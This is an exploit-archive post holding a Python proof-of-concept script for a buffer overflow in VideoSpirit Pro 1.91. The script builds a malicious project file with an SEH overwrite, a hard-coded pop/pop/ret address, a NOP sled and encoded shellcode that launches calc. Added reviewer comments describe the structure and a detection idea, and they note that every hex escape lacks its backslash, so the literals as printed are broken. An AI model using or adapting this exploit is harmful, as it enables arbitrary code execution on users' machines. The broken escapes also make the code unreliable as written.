
VideoSpirit Pro 1.91 Buffer Overflow

Posted on 28 April 2015

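#!/usr/bin/python
# Exploit Title: VideoSpirit Pro v1.91
# Date: 27/April/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003@yahoo.com
# Version: 1.91
# Tested on: Win XP3 and Win 7
#Vendor: http://www.verytools.com/
#Software link: http://www.verytools.com/videospirit/download.html
#Greetz: b33f,corelan,offsec,vulnhub,HUST510
#
# Reviewer notes (structure of the proof of concept, for analysis and detection):
#
# * The script writes a VideoSpirit project file, evil.visprj, assembled as
#   Header + buffer + Footer.
# * Header and Footer are hex-encoded project XML. The Header's hex values end
#   with `<valitem name="mp3" value="` and the Footer's begin with `" />`, so
#   the oversized `buffer` lands inside one `value` attribute. Presumably the
#   overflow occurs while the application parses that attribute; the page does
#   not show the vulnerable code.
# * `buffer` is padded to `buffersize` (5000). Its layout is 104 filler bytes,
#   a 4-byte stub starting EB 07 (an x86 short jump), a 4-byte address, 24
#   0x90 bytes and an encoded payload. The author's comments identify the
#   address as a pop/pop/ret sequence in OverlayPlug.dll and the payload as
#   windows/exec CMD=calc. This ordering matches the usual SEH-record
#   overwrite pattern (inferred from the layout, not stated by the author).
# * The address is hard-coded, which suggests OverlayPlug.dll loaded at a
#   fixed base on the tested systems. Whether the module opts in to ASLR and
#   SafeSEH, and whether SEHOP is enabled on the host, should be confirmed
#   when assessing exposure.
# * Detection idea: a .visprj file whose `valitem` `value` attribute runs to
#   thousands of bytes or contains non-printable data is anomalous.
# * NOTE(review): in this copy the hex escapes appear without their
#   backslashes (`x3C` where `\x3C` would be expected). The literals below are
#   reproduced exactly as printed on the page.

buffersize = 5000

# Leading part of the project XML, up to the opening quote of the attribute
# value that receives `buffer`.
Header = ("x3Cx76x65x72x73x69x6Fx6Ex20x76x61x6Cx75x65x3Dx22x33x22x20" +
          "x2Fx3Ex0Ax3Cx74x72x61x63x6Bx3Ex0Ax20x20x20x20x3Cx74x79x70" +
          "x65x20x76x61x6Cx75x65x3Dx22x30x22x20x2Fx3Ex0Ax20x20x20x20" +
          "x3Cx74x79x70x65x20x76x61x6Cx75x65x3Dx22x34x22x20x2Fx3Ex0A" +
          "x20x20x20x20x3Cx74x79x70x65x20x76x61x6Cx75x65x3Dx22x32x22" +
          "x20x2Fx3Ex0Ax20x20x20x20x3Cx74x79x70x65x20x76x61x6Cx75x65" +
          "x3Dx22x31x22x20x2Fx3Ex0Ax20x20x20x20x3Cx74x79x70x65x20x76" +
          "x61x6Cx75x65x3Dx22x37x22x20x2Fx3Ex0Ax3Cx2Fx74x72x61x63x6B" +
          "x3Ex0Ax3Cx74x72x61x63x6Bx30x20x2Fx3Ex0Ax3Cx74x72x61x63x6B" +
          "x31x20x2Fx3Ex0Ax3Cx74x72x61x63x6Bx32x20x2Fx3Ex0Ax3Cx74x72" +
          "x61x63x6Bx33x20x2Fx3Ex0Ax3Cx74x72x61x63x6Bx34x20x2Fx3Ex0A" +
          "x3Cx63x6Cx69x70x20x2Fx3Ex0Ax3Cx6Fx75x74x70x75x74x20x74x79" +
          "x70x65x6Ex61x6Dx65x3Dx22x41x56x49x22x20x6Bx65x65x70x61x73" +
          "x70x65x63x74x3Dx22x30x22x20x70x72x65x73x65x74x71x75x61x6C" +
          "x69x74x79x3Dx22x30x22x3Ex0Ax20x20x20x20x3Cx74x79x70x65x30" +
          "x20x65x6Ex61x62x6Cx65x3Dx22x31x22x3Ex0Ax20x20x20x20x20x20" +
          "x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x6Dx73" +
          "x6Dx70x65x67x34x76x32x22x20x76x61x6Cx75x65x3Dx22x6Dx73x6D" +
          "x70x65x67x34x76x32x22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20" +
          "x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x33x32x30x2A" +
          "x32x34x30x28x34x3Ax33x29x22x20x76x61x6Cx75x65x3Dx22x33x32" +
          "x30x2Ax32x34x30x22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20x3C" +
          "x76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x33x30x22x20x76" +
          "x61x6Cx75x65x3Dx22x33x30x22x20x2Fx3Ex0Ax20x20x20x20x20x20" +
          "x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x31x36" +
          "x30x30x30x6Bx22x20x76x61x6Cx75x65x3Dx22x31x36x30x30x30x6B" +
          "x22x20x2Fx3Ex0Ax20x20x20x20x3Cx2Fx74x79x70x65x30x3Ex0Ax20" +
          "x20x20x20x3Cx74x79x70x65x31x20x65x6Ex61x62x6Cx65x3Dx22x31" +
          "x22x3Ex0Ax20x20x20x20x20x20x20x20x3Cx76x61x6Cx69x74x65x6D" +
          "x20x6Ex61x6Dx65x3Dx22x6Dx70x33x22x20x76x61x6Cx75x65x3Dx22")

# Filler up to the overwritten record.
buffer = "A" * 104
# 4-byte stub placed immediately before the overwritten address.
buffer += "xEBx07x90x90"
#0x100caa30 : pop ebp # pop ecx # ret | {PAGE_EXECUTE_READ} [OverlayPlug.dll]
buffer += "x30xaax0Cx10"
buffer += "x90" * 24
#msfpayload windows/exec CMD=calc R|msfencode -b "x00x0ax0dx21x22" -t c -e x86/shikata_ga_nai
buffer += ("xd9xc3xbax97xfdx6fx90xd9x74x24xf4x5ex33xc9xb1"
           "x32x31x56x17x03x56x17x83x79x01x8dx65x79x12xdb"
           "x86x81xe3xbcx0fx64xd2xeex74xedx47x3fxfexa3x6b"
           "xb4x52x57xffxb8x7ax58x48x76x5dx57x49xb6x61x3b"
           "x89xd8x1dx41xdex3ax1fx8ax13x3ax58xf6xdcx6ex31"
           "x7dx4ex9fx36xc3x53x9ex98x48xebxd8x9dx8ex98x52"
           "x9fxdex31xe8xd7xc6x3axb6xc7xf7xefxa4x34xbex84"
           "x1fxcex41x4dx6ex2fx70xb1x3dx0exbdx3cx3fx56x79"
           "xdfx4axacx7ax62x4dx77x01xb8xd8x6axa1x4bx7ax4f"
           "x50x9fx1dx04x5ex54x69x42x42x6bxbexf8x7exe0x41"
           "x2fxf7xb2x65xebx5cx60x07xaax38xc7x38xacxe4xb8"
           "x9cxa6x06xacxa7xe4x4cx33x25x93x29x33x35x9cx19"
           "x5cx04x17xf6x1bx99xf2xb3xd4xd3x5fx95x7cxbax35"
           "xa4xe0x3dxe0xeax1cxbex01x92xdaxdex63x97xa7x58"
           "x9fxe5xb8x0cx9fx5axb8x04xfcx3dx2axc4x03")
# Pad so the attribute value is always `buffersize` characters long.
buffer += "A" * (buffersize - len(buffer))

# Remainder of the project XML, starting with the closing quote of the
# attribute value that received `buffer`.
Footer = ("x22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20x3Cx76x61x6Cx69x74x65" +
          "x6Dx20x6Ex61x6Dx65x3Dx22x31x32x38x6Bx22x20x76x61x6Cx75x65x3D" +
          "x22x31x32x38x6Bx22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20x3Cx76" +
          "x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x34x34x31x30x30x22x20" +
          "x76x61x6Cx75x65x3Dx22x34x34x31x30x30x22x20x2Fx3Ex0Ax20x20x20" +
          "x20x20x20x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22" +
          "x32x20x28x53x74x65x72x65x6Fx29x22x20x76x61x6Cx75x65x3Dx22x32" +
          "x22x20x2Fx3Ex0Ax20x20x20x20x3Cx2Fx74x79x70x65x31x3Ex0Ax20x20" +
          "x20x20x3Cx74x79x70x65x32x20x65x6Ex61x62x6Cx65x3Dx22x30x22x20" +
          "x2Fx3Ex0Ax3Cx2Fx6Fx75x74x70x75x74x3E")

sploit = Header + buffer + Footer

try:
    print("[+]Creating Exploit File... ")
    # The original wrote `file.close` without parentheses, so the handle was
    # never explicitly closed; the context manager closes it on every path
    # and avoids shadowing the Python 2 builtin `file`.
    with open("evil.visprj", "w") as handle:
        handle.write(sploit)
    print("[+]File evil.visprj create successfully. ")
except (IOError, OSError):
    # Narrowed from a bare `except:` so that only file-system failures are
    # reported as a failed write; anything else surfaces normally.
    print("*Failed to create file!!! ")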

 
